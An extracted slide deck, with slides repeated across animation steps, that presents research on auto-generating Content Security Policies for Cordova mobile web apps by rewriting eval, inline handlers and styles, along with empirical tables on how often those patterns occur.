![Page 84: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/84.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Gather all related Javascript
Extract code from inline Javascript tags<script>alert(’INLINE’)</script>Load code from external Javascript tags<script src=”app.js”></script>Extract code from inline event handlers<div onclick=”alert(’EVENT HANDLER’)”></div>
27 / 51
![Page 85: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/85.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Gather all related Javascript
Extract code from inline Javascript tags<script>alert(’INLINE’)</script>Load code from external Javascript tags<script src=”app.js”></script>Extract code from inline event handlers<div onclick=”alert(’EVENT HANDLER’)”></div>
27 / 51
![Page 86: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/86.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Extract all URLs
Extract sources for connect-src
XMLHttpRequest.open(”GET”, ”https://example.ch”);new WebSocket(”https://example.ch”);...
Extract sources for worker-src
new Worker(”https://example.ch/w.js”);navigator.serviceWorker.register(”https://example.ch/w.js”);...
28 / 51
![Page 87: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/87.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Extract all URLs
Extract sources for connect-src
XMLHttpRequest.open(”GET”, ”https://example.ch”);new WebSocket(”https://example.ch”);...
Extract sources for worker-src
new Worker(”https://example.ch/w.js”);navigator.serviceWorker.register(”https://example.ch/w.js”);...
28 / 51
![Page 88: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/88.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Extract all URLs
Extract sources for connect-src
XMLHttpRequest.open(”GET”, ”https://example.ch”);new WebSocket(”https://example.ch”);...
Extract sources for worker-src
new Worker(”https://example.ch/w.js”);navigator.serviceWorker.register(”https://example.ch/w.js”);...
28 / 51
![Page 89: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/89.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Extract all URLs
Extract sources for connect-src
XMLHttpRequest.open(”GET”, ”https://example.ch”);new WebSocket(”https://example.ch”);...
Extract sources for worker-src
new Worker(”https://example.ch/w.js”);navigator.serviceWorker.register(”https://example.ch/w.js”);...
28 / 51
![Page 90: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/90.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Extract all URLs
Extract sources for connect-src
XMLHttpRequest.open(”GET”, ”https://example.ch”);new WebSocket(”https://example.ch”);...
Extract sources for worker-src
new Worker(”https://example.ch/w.js”);navigator.serviceWorker.register(”https://example.ch/w.js”);...
28 / 51
![Page 91: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/91.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Rewriting APIs impacted by style-src
setAttribute
// Original
a.setAttribute("style", "display:none");
// Rewritten
a.style.display = "none";
29 / 51
![Page 92: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/92.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Rewriting APIs impacted by style-src
cssText
// Original
a.style.cssText = "background-color:none";
// Rewritten
a.style.backgroundColor = "none";
30 / 51
![Page 93: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/93.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Rewriting APIs impacted by style-src
insertRule
// Original
stylesheet.insertRule("#someId { color: white }", 0);
// Rewritten
var newStyleTag = document.createElement("style");
newStyleTag.innerText = "#someId { color: white }";
document.head.appendChild(newStyleTag);
31 / 51
![Page 94: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/94.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Rewriting APIs impacted by script-src
eval
// Original
eval(’alert("Example")’);
eval(’{"key1": "value1", "key2": "value2"}’);
// Rewritten
alert("Example");
JSON.parse(’{"key1": "value1", "key2": "value2"}’);
32 / 51
![Page 95: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/95.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Rewriting APIs impacted by script-src
setTimeout/setInterval
// Original
setTimeout(’alert("Example")’, 1000);
setInterval(’alert("Example")’, 1000);
// Rewritten
setTimeout(function() {alert("Example")}, 1000);
setInterval(function() {alert("Example")}, 1000);
33 / 51
![Page 96: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/96.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Rewriting APIs impacted by script-src
Function
// Original
new Function("a", "b", "return a*b");
// Rewritten
function(a, b) {return a*b};
34 / 51
![Page 97: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/97.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Processing related Javascript
Rewriting APIs impacted by script-src
setAttribute for event handlers
// Original
a.setAttribute("onclick", ’alert("XSS")’);
// Rewritten
a.onclick = function() {alert("XSS")};
35 / 51
![Page 98: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/98.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The pipeline
36 / 51
![Page 99: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/99.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Extracting sources from HTML and Javascript
connect-src:<a ping=”https://example.ch”>
frame-src:<iframe src=”https://example.ch”>
img-src:<img src=”https://example.ch/image.jpg”>
media-src:<audio src=”https://example.ch”>
object-src:<object data=”https://example.ch”>
Combine with data from JS
37 / 51
![Page 100: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/100.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Extracting sources from HTML and Javascript
connect-src:<a ping=”https://example.ch”>
frame-src:<iframe src=”https://example.ch”>
img-src:<img src=”https://example.ch/image.jpg”>
media-src:<audio src=”https://example.ch”>
object-src:<object data=”https://example.ch”>
Combine with data from JS
37 / 51
![Page 101: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/101.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The pipeline
38 / 51
![Page 102: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/102.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Rewriting styles and extracting related sources
Rewriting inline style attributes
// Original
<div style="height: 100px;">
// Rewritten
<div id="tmYuSGfL">
<style>#tmYuSGfL { height: 100px; }</style>
39 / 51
![Page 103: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/103.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Rewriting styles and extracting related sources
Iterate over all CSS rules
style-src:@import url(”https://example.ch/styles.css”)font-src:@font-face { src: url(”https://not-example.com/font”); }img-src:background-image: url(”image.gif”);
Generate all hashes
Combine with data from JS
40 / 51
![Page 104: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/104.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Rewriting styles and extracting related sources
Iterate over all CSS rules
style-src:@import url(”https://example.ch/styles.css”)font-src:@font-face { src: url(”https://not-example.com/font”); }img-src:background-image: url(”image.gif”);
Generate all hashes
Combine with data from JS
40 / 51
![Page 105: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/105.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Rewriting styles and extracting related sources
Iterate over all CSS rules
style-src:@import url(”https://example.ch/styles.css”)font-src:@font-face { src: url(”https://not-example.com/font”); }img-src:background-image: url(”image.gif”);
Generate all hashes
Combine with data from JS
40 / 51
![Page 106: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/106.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Rewriting styles and extracting related sources
Iterate over all CSS rules
style-src:@import url(”https://example.ch/styles.css”)font-src:@font-face { src: url(”https://not-example.com/font”); }img-src:background-image: url(”image.gif”);
Generate all hashes
Combine with data from JS
40 / 51
![Page 107: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/107.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The pipeline
41 / 51
![Page 108: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/108.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Rewriting scripts and extracting related sources
Rewriting inline event handlers
// Original
<div onclick=’alert("Example")’>
// Rewritten
<div id="tmYuSGfL">
<script>
document.getElementById("tmYuSGfL")
.addEventListener(
"onclick",
function() { alert("Example") }
)
</script>
42 / 51
![Page 109: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/109.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Rewriting scripts and extracting related sources
Generate all hashes
Combine with data from JS
Add ’strict-dynamic’
43 / 51
![Page 110: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/110.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Rewriting scripts and extracting related sources
Generate all hashes
Combine with data from JS
Add ’strict-dynamic’
43 / 51
![Page 111: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/111.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Rewriting scripts and extracting related sources
Generate all hashes
Combine with data from JS
Add ’strict-dynamic’
43 / 51
![Page 112: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/112.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Table of Contents
1 Mobile Web Apps
2 Code Injection
3 Content Security Policy
4 Research Questions
5 Automatically Applying CSP
6 Results
44 / 51
![Page 113: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/113.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Limiting patterns
Patterns inherent to CSP
No full equivalent for the ”Function” constructor
new Function(”a”, ”b”, ”return a*b”);function(a, b) {return a*b};
Patterns inherent to specific use cases
Apps that connect to user-defined URLsApps that connect to dynamically chosen API endpoints
45 / 51
![Page 114: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/114.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Limiting patterns
Patterns inherent to CSPNo full equivalent for the ”Function” constructor
new Function(”a”, ”b”, ”return a*b”);function(a, b) {return a*b};
Patterns inherent to specific use cases
Apps that connect to user-defined URLsApps that connect to dynamically chosen API endpoints
45 / 51
![Page 115: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/115.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Limiting patterns
Patterns inherent to CSPNo full equivalent for the ”Function” constructor
new Function(”a”, ”b”, ”return a*b”);function(a, b) {return a*b};
Patterns inherent to specific use cases
Apps that connect to user-defined URLsApps that connect to dynamically chosen API endpoints
45 / 51
![Page 116: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/116.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Limiting patterns
Patterns inherent to CSPNo full equivalent for the ”Function” constructor
new Function(”a”, ”b”, ”return a*b”);function(a, b) {return a*b};
Patterns inherent to specific use cases
Apps that connect to user-defined URLsApps that connect to dynamically chosen API endpoints
45 / 51
![Page 117: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/117.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Limiting patterns
Patterns inherent to CSPNo full equivalent for the ”Function” constructor
new Function(”a”, ”b”, ”return a*b”);function(a, b) {return a*b};
Patterns inherent to specific use cases
Apps that connect to user-defined URLs
Apps that connect to dynamically chosen API endpoints
45 / 51
![Page 118: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/118.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Limiting patterns
Patterns inherent to CSPNo full equivalent for the ”Function” constructor
new Function(”a”, ”b”, ”return a*b”);function(a, b) {return a*b};
Patterns inherent to specific use cases
Apps that connect to user-defined URLsApps that connect to dynamically chosen API endpoints
45 / 51
![Page 119: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/119.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Limiting patterns
Patterns inherent to my approach
Non-constant parameters in restricted APIs
a.style.cssText = someVariablesetTimeout(someVariable, 1000)...
Adding styles/scripts implicitly from strings
someElement.innerHTML = ”<div onclick=’...’></div>”;someElement.innerHTML = ”<div style=’...’></div>”;someElement.innerHTML = ”<style>...</style>”;
HTML templating enginesInability to rewrite remote resources
46 / 51
![Page 120: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/120.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Limiting patterns
Patterns inherent to my approachNon-constant parameters in restricted APIs
a.style.cssText = someVariablesetTimeout(someVariable, 1000)...
Adding styles/scripts implicitly from strings
someElement.innerHTML = ”<div onclick=’...’></div>”;someElement.innerHTML = ”<div style=’...’></div>”;someElement.innerHTML = ”<style>...</style>”;
HTML templating enginesInability to rewrite remote resources
46 / 51
![Page 121: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/121.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Limiting patterns
Patterns inherent to my approachNon-constant parameters in restricted APIs
a.style.cssText = someVariablesetTimeout(someVariable, 1000)...
Adding styles/scripts implicitly from strings
someElement.innerHTML = ”<div onclick=’...’></div>”;someElement.innerHTML = ”<div style=’...’></div>”;someElement.innerHTML = ”<style>...</style>”;
HTML templating enginesInability to rewrite remote resources
46 / 51
![Page 122: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/122.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Limiting patterns
Patterns inherent to my approachNon-constant parameters in restricted APIs
a.style.cssText = someVariablesetTimeout(someVariable, 1000)...
Adding styles/scripts implicitly from strings
someElement.innerHTML = ”<div onclick=’...’></div>”;someElement.innerHTML = ”<div style=’...’></div>”;someElement.innerHTML = ”<style>...</style>”;
HTML templating enginesInability to rewrite remote resources
46 / 51
![Page 123: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/123.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Limiting patterns
Patterns inherent to my approachNon-constant parameters in restricted APIs
a.style.cssText = someVariablesetTimeout(someVariable, 1000)...
Adding styles/scripts implicitly from strings
someElement.innerHTML = ”<div onclick=’...’></div>”;someElement.innerHTML = ”<div style=’...’></div>”;someElement.innerHTML = ”<style>...</style>”;
HTML templating enginesInability to rewrite remote resources
46 / 51
![Page 124: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/124.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Limiting patterns
Patterns inherent to my approachNon-constant parameters in restricted APIs
a.style.cssText = someVariablesetTimeout(someVariable, 1000)...
Adding styles/scripts implicitly from strings
someElement.innerHTML = ”<div onclick=’...’></div>”;someElement.innerHTML = ”<div style=’...’></div>”;someElement.innerHTML = ”<style>...</style>”;
HTML templating engines
Inability to rewrite remote resources
46 / 51
![Page 125: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/125.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Limiting patterns
Patterns inherent to my approachNon-constant parameters in restricted APIs
a.style.cssText = someVariablesetTimeout(someVariable, 1000)...
Adding styles/scripts implicitly from strings
someElement.innerHTML = ”<div onclick=’...’></div>”;someElement.innerHTML = ”<div style=’...’></div>”;someElement.innerHTML = ”<style>...</style>”;
HTML templating enginesInability to rewrite remote resources
46 / 51
![Page 126: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/126.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Empirical results
API % Apps % Apps (w/o library files)
setTimeout / setInterval 98.30 73.65
eval 89.45 36.89
cssText 83.27 28.68
Function 61.21 29.41
setAttribute (style) 30.91 21.45
insertRule 4 4
setAttribute (event handler) 3.88 3.31
Table 1: Apps containing CSP-relevant APIs
47 / 51
![Page 127: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/127.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Empirical results
Keyword % Rewritten % Not rewritten
script-src: unsafe-inline 3.27 0.61
script-src: unsafe-eval 0 98.55
style-src: unsafe-inline 8 22.91
style-src: unsafe-eval 2.42 81.33
Table 2: Apps we could/couldn’t rewrite in relation to total number ofapps
48 / 51
![Page 128: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/128.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Empirical results
Keyword % Rewritten % Not rewritten
script-src: unsafe-inline 84.28 15.72
script-src: unsafe-eval 0 100
style-src: unsafe-inline 25.88 74.12
style-src: unsafe-eval 2.89 97.11
Table 3: Apps we could/couldn’t rewrite in relation to number of appsthat needed rewriting
49 / 51
![Page 129: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/129.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions revisited
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
50 / 51
![Page 130: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/130.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions revisited
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
50 / 51
![Page 131: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/131.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions revisited
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
